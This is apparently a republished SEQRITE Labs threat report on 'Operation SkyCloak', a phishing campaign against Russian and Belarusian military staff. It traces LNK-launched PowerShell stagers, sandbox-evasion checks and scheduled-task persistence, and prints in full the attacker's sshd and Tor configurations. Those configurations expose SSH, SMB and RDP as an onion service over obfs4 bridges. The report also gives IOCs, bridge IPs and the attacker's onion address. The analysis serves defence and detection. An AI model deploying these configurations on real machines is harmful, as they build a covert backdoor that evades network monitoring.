لرن سرا

برچسب: Russia

  • Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus

    Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus


    Authors: Sathwik Ram Prakki and Kartikkumar Jivani 

    Contents 

    • Introduction 
    • Key Targets 
      • Industries 
      • Geographical Focus 
    • Infection and Decoys 
    • Technical Analysis 
      • PowerShell Stage 
      • Persistence 
      • Configuration 
    • Infrastructure and Attribution 
    • Conclusion 
    • SEQRITE Protection 
    • IOCs 
    • MITRE ATT&CK 

    Introduction 

    SEQRITE Labs has identified a campaign targeting military personnel of both Russia and Belarus, especially the Russian Airborne Forces and Belarusian Special Forces. The infection chain leads to exposing multiple local services via Tor using obfs4 bridges, allowing the attacker to anonymously communicate via an onion address. In this blog, we will explore the infection chain that uses multiple stages through PowerShell, decoys used to lure the victims, and exposing SSH as a hidden service to unblock traffic for Tor while maintaining persistence. 

    Multiple campaigns with similar geographical focus have been identified this year such as HollowQuill seen in early 2025, that targeted various Russian entities such as academic & research institutes which are directly linked to government and defence sectors. In July, we have encountered another campaign dubbed CargoTalon that has targeted aerospace and defense sectors of Russia deploying Eaglet implant, where overlaps with HeadMare group were observed. Recently, targeting of Russian automobile and e-commerce industry with CAPI Backdoor has been tracked as operation MotorBeacon. 

    Key Targets 

    Industries 

    Geographical Focus 

    • Russian Federation 
    • Republic of Belarus 

    Infection and Decoys 

     

    Fig. 1 – Infection Chain 

    The first lure is a nomination letter from the acting commander of Military Unit 71289, which refers to the 83rd Separate Guards Airborne Assault Brigade stationed in Ussuriysk (Eastern Military District), to the Chief of Russian Airborne Forces (VDV) for appointment of military personnel. Ussuriysk is completely opposite to the ongoing Russia-Ukraine war but closer to both the China-Russia border and the Pacific Ocean. 

    Fig. 2 – Decoy targeting Russia 

    The second decoy letter is meant for training of military personnel from October 13th to 16th 2025 at Military Unit 89417, which refers to the 5th Separate Spetsnaz Brigade of the Belarusian Special Forces located in Maryina Horka near Minsk (Reports suggest that the unit got disbanded in 2019 but some activity was seen in 2021). 


    Fig. 3 – Decoy targeting Belarus 

    Technical Analysis 

    The archive files have been uploaded from Belarus with modification dates as 2025-Oct-15 and 2025-Oct-21. The initial phishing ZIP contains a shortcut LNK with double extension format that translates as follows: 

    Original filename  Translated name 
    ТЛГ на убытие на переподготовку.pdf.lnk  TLG departure for retraining.pdf.lnk 
    Исх №6626 Представление на назначение на воинскую должность.pdf.lnk  Ref. No. 6626 Nomination for appointment to military position.pdf.lnk 

    Shortcut files have machine IDs ‘desktop-V7i6LHO’ and ‘desktop-u4a2HgZ’ that seem to be weaponized in the last week of September 2025. They trigger PowerShell commands which act as the initial dropper stage where another archive file beside the LNK is used to set up the entire chain. 

    Fig. 4 – Shortcut file triggers PowerShell 

    The command extracts the first archive file into either of the directories: 

    • %APPDATA%\dynamicUpdatingHashingScalingContext 
    • %USERPROFILE%\Downloads\incrementalStreamingMergingSocket 

    and subsequently uses it to extract the second archive file from the folder ‘FOUND.000’. This multi-stage extraction drops the payloads into either ‘$env:APPDATA\logicpro’ or ‘$env:APPDATA\reaper’ directories, reads the content of a text file and executes it silently via hidden PowerShell process. 

    • \logicpro\scalingEncryptingEncoding 
    • \reaper\responsiveHashingSocketScalableDeterministic 

    Before jumping into the next stage, let’s look at the contents of both the archives. It contains multiple EXEs and text files, the decoy PDF, a DLL, and a couple of XML files. Following the above chain, the next stage is execution of PowerShell script. 

    Fig. 5 – Contents of archive files 

    PowerShell Stage 

    The script starts by checking the Windows ‘Recent’ folder and if it has more than ten shortcut files in it. This is an anti-analysis check to evade sandbox environments and make sure there’s normal user activity. Another check is done to see if the process count is greater than 50 and opens the decoy document. 

    Fig. 6 – PowerShell anti-analysis 

    Then it creates a mutex to ensure that only one instance is running. It reads both the XML files after replacing the username and registers scheduled tasks to start them immediately. This establishes persistence and executes the next stage of payloads defined in those XMLs. Multiple strings are concatenated to form the full onion address. 

    Fig. 7 – PowerShell stager 

    Then it waits until the hostname file exists which is written by Tor based on the configuration for the hidden service directory. So it waits until the local Tor instance is up and the onion is available. It creates an identification beacon in a specific format ‘<username>:<onion-address>:3-yeeifyem‘ or ends with ‘:2-lrwkymi’ and uses curl via local Tor SOCKS listener on port 9050. Multiple retry flags are used to make this persistent. 

    Fig. 8 – local hostname for beacon 

    Persistence 

    XML files are Windows scheduled task definitions that runs daily starting at 2025-09-25T01:41:00-08:00 and has a logon trigger for the user specified. These tasks are hidden and configured to run even when the computer is idle, on demand, and without network. They ignore multiple instances and have no execution time limit. 

    Fig. 9 – XML for persistence 

    Fig. 10 – Scheduled Task 

     Finally moving on to the EXEs to which configuration files are passed as arguments; some are most likely SSH and SFTP server binaries based on the PDB paths and internal names. XML files trigger either the first or last two commands (both campaigns included): 

    • %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting 
    • %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster 
    • %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession 
    • %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant 

    Both githubdesktop.exe and googlemaps.exe from above, along with ssh-shellhost.exe, ebay.exe (SFTP server) and libcrypto.dll (LibreSSL) are legitimate “OpenSSH for Windows” binaries with compilation timestamp 2023-12-13 and PDB paths: 

    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb” 
    • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb” 
    • C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb 

    libcrypto.dll is bundled for encryption, key exchange, and hashing; whereas ssh-shellhost.exe is used for interactive SSH sessions. This confirms that the attacker deploys a self-contained OpenSSH server inside a user’s profile directory using Tor, likely for stealth remote administration and post-exploitation persistence. 

    Configuration 

    The first configuration passed to SSHD [githubdesktop.exe (or) googlemaps.exe] is as follows, with the only difference between the two campaigns being that sftp subsystem is not present in the second one. Usage of non-standard port 20321 is seen, passwords are disabled and allowed only by public key along with files containing private and authorized keys. Files containing these keys are: 

    • redundantOptimizingInstanceVariableLogging 
    • redundantExecutingContainerIndexing 
    • incrementalMergingIncrementalImmutableProtocol 
    • loggingOptimizedDecoding 
    Port 20321 
ListenAddress 127.0.0.1 
HostKey redundantOptimizingInstanceVariableLogging 
PubkeyAuthentication yes 
PasswordAuthentication no     

AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing 
Subsystem sftp AppData\Roaming\logicpro\ebay.exe 

    The second configuration is passed to pinterest.exe (or) googlesheets.exe, which is basically tor.exe, that creates an onion service and exposes SSH, SMB, RDP and other ports over Tor. It is configured to use a pluggable transport obfs4 via an EXE named confluence.exe (or) rider.exe, which is simply an obfs4proxy binary. Usage of bridges is seen which is used to hide connections. Bridge endpoints are defined with IP, port, fingerprint, cert and iat-mode; to allow outbound Tor connections via those bridges. 

    Fig. 11 – Communication with Tor bridges 

    HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" 
HiddenServicePort 20322 127.0.0.1:20321 
HiddenServicePort 11435 127.0.0.1:445 
HiddenServicePort 13893 127.0.0.1:3389 
HiddenServicePort 12192 127.0.0.1:12191 
HiddenServicePort 14763 127.0.0.1:14762 
GeoIPFile geoip 
GeoIPv6File geoip6 

ClientTransportPlugin obfs4 exec confluence.exe  
UseBridges 1 
Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 
Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2 

    In the same way legitimate obfs4proxy.exe is renamed and used in the configuration as confluence.exe and rider.exe. 

    Infrastructure and Attribution 

    The onion link used for registering victim via tor is: 

    • yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    Based on the recent netflow data from these tor bridge ports, we have seen traffic with Russia and even few neighboring nations. These IPs are categorized as either tor service or residential. 

    IP:Port  ASN  Country  Category 
    77.20.116[.]133:8080   3209 (Vodafone GmbH)  Germany  residential, proxy 
    156.67.24[.]239:33333  51167 (Contabo GmbH)  France  tor 
    146.59.116[.]226:50845  16276 (OVH SAS)  Poland  cloud 
    142.189.114[.]119:443  577 (BACOM)  Canada   

    Very less traffic is seen on both 156.67.24[.]239:33333 and 77.20.116[.]133:8080. Whereas Russia is seen on the remaining two IPs, which are part of the configuration and decoys targeting Russia. 

    Two Russian-linked groups, APT44 (Sandworm) and APT28, have been observed to use tor to communicate with onion domain previously. But in this case, custom configurations for pluggable transport and SSHD are used in an attempt to evade network monitoring, and these attacks are targeted towards Russia and Belarus. Similar targeting has been observed to be conducted by pro-Ukraine APTs Angry Likho (Sticky Werewolf) and Awaken Likho (Core Werewolf) but SkyCloak remains unattributed for now. 

    Conclusion 

    A multi-chain intrusion chain has been identified, targeting both Russian and Belarusian military personnel, which leads to PowerShell stager that deploys OpenSSH and Tor bridges. This shows a stealth-oriented campaign designed to establish covert remote access and lateral movements within targeted environments. Based on current evidence, the campaign appears consistent with Eastern European-linked espionage activity targeting defense and government sectors, though attribution remains with low confidence with previously documented operations. 

    SEQRITE Protection 

    • XML.Skycloak.50052.GC 
    • SCRIPT.Trojan.50053.GC 
    • SCRIPT.Skycloak.50054 

    IOCs 

    Archive (ZIP) 
    952f86861feeaf9821685cc203d67004  ТЛГ на убытие на переподготовку.pdf 
    d246dfa9e274c644c5a9862350641bac  persistentHandlerHashingEncodingScalable.zip 
    8716989448bc88ba125aead800021db0  Исх №6626 Представление на назначение на воинскую должность.pdf.zip 
    ae4f82f9733e0f71bb2a566a74eb055c  processorContainerLogging.zip 
    Shortcut (LNK) 
    32bdbf5c26e691cbbd451545bca52b56  ТЛГ на убытие на переподготовку.pdf.lnk 
    2731b3e8524e523a84dc7374ae29ac23  Исх №6626 Представление на назначение на воинскую должность.pdf.lnk 
    PowerShell (PS1) 
    39937e199b2377d1f212510f1f2f7653  scalingEncryptingEncoding 
    9242b49e9581fa7f2100bd9ad4385e8c  responsiveHashingSocketScalableDeterministic 
    XML 
    b61a80800a1021e9d0b1f5e8524c5708  loadingBufferFunctionHashing.xml 
    b52dfb562c1093a87b78ffb6bfc78e07  incrementalRedundantRendering.xml 
    45b16a0b22c56e1b99649cca1045f500  synchronizingContextBufferSchemaIncremental.xml 
    dcdf4bb3b1e8ddb24ac4e7071abd1f65  frameworkRepositoryDynamicOptimized.xml 
    Text 
    e1a8daea05f25686c359db8fa3941e1d  controllerGatewayEncrypting 
    b3382b6a44dc2cefdf242dc9f9bc9d84  pipelineClusterDeployingCluster 
    229afc52dccd655ec1a69a73369446dd  hashingBindingDynamicUpdatingSession 
    f6837c62aa71f044366ac53c60765739  decodingDistributedParsingHandlerRedundant 
    2599d1b1d6fe13002cb75b438d9b80c4  redundantExecutingContainerIndexing 
    b7ae44ac55ba8acb527b984150c376e2  redundantOptimizingInstanceVariableLogging 
    0f6aaa52b05ab76020900a28afff9fff  redundantOptimizingInstanceVariableLogging.pub 
    219e7d3b6ff68a36c8b03b116b405237  loggingOptimizedDecoding 
    dfc78fe2c31613939b570ced5f38472c  incrementalMergingIncrementalImmutableProtocol 
    77bb74dd879914eea7817d252dbab1dc  incrementalMergingIncrementalImmutableProtocol.pub 
    PE (EXE/DLL) 
    f6c0304671c4485c04d4a1c7c8c8ed94  githubdesktop.exe / googlemaps.exe (sshd.exe) 
    cdd065c52b96614dc880273f2872619f  pinterest.exe / googlesheets.exe (tor.exe) 
    37e83a8fc0e4e6ea5dab38b0b20f953b  ebay.exe (sftp-server.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  ssh-shellhost.exe 
    664f09734b07659a6f75bca3866ae5e8  confluence.exe / rider.exe (obfs4proxy.exe) 
    6eafae19d2db29f70fa24a95cf71a19d  libcrypto.dll 
    Decoys 
    23ad48b33d5a6a8252ed5cd38148dcb7  ТЛГ на убытие на переподготовку.pdf 
    c8c41b7e02fc1d98a88f66c3451a081b  Исх №6626 Представление на назначение на воинскую должность.pdf 
    Tor Bridges 
    77.20.116[.]133:8080 156.67.24[.]239:33333 

    146.59.116[.]226:50845 142.189.114[.]119:443 

    		  
    yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

    MITRE ATT&CK 

    Tactic  Technique ID  Technique Name 
    Resource Development  T1583  Acquire Infrastructure 
    Initial Access  T1566.001  Phishing: Spearphishing Attachment 
    Execution  T1204.002  User Execution: Malicious File 
    T1059.001  Command and Scripting Interpreter: PowerShell 
       
    T1106  Native API 
    Persistence  T1053.005  Scheduled Task 
    T1547  Boot or Logon Autostart Execution 
    T1027  Obfuscated Files or Information 
    Defense Evasion  T1036  Masquerading 
    T1497  Virtualization/Sandbox Evasion 
    Discovery  T1083  File and Directory Discovery 
    T1046  Network Service Discovery 
    T1033  System Owner/User Discovery 
    Lateral Movement  T1021  Remote Services 
    Collection  T1119  Automated Collection 
    Command and Control  T1071  Application Layer Protocol 
    T1090  Proxy 
    T1571  Non-Standard Port 
    Exfiltration  T1041  Exfiltration Over C2 Channel 

     



    Source link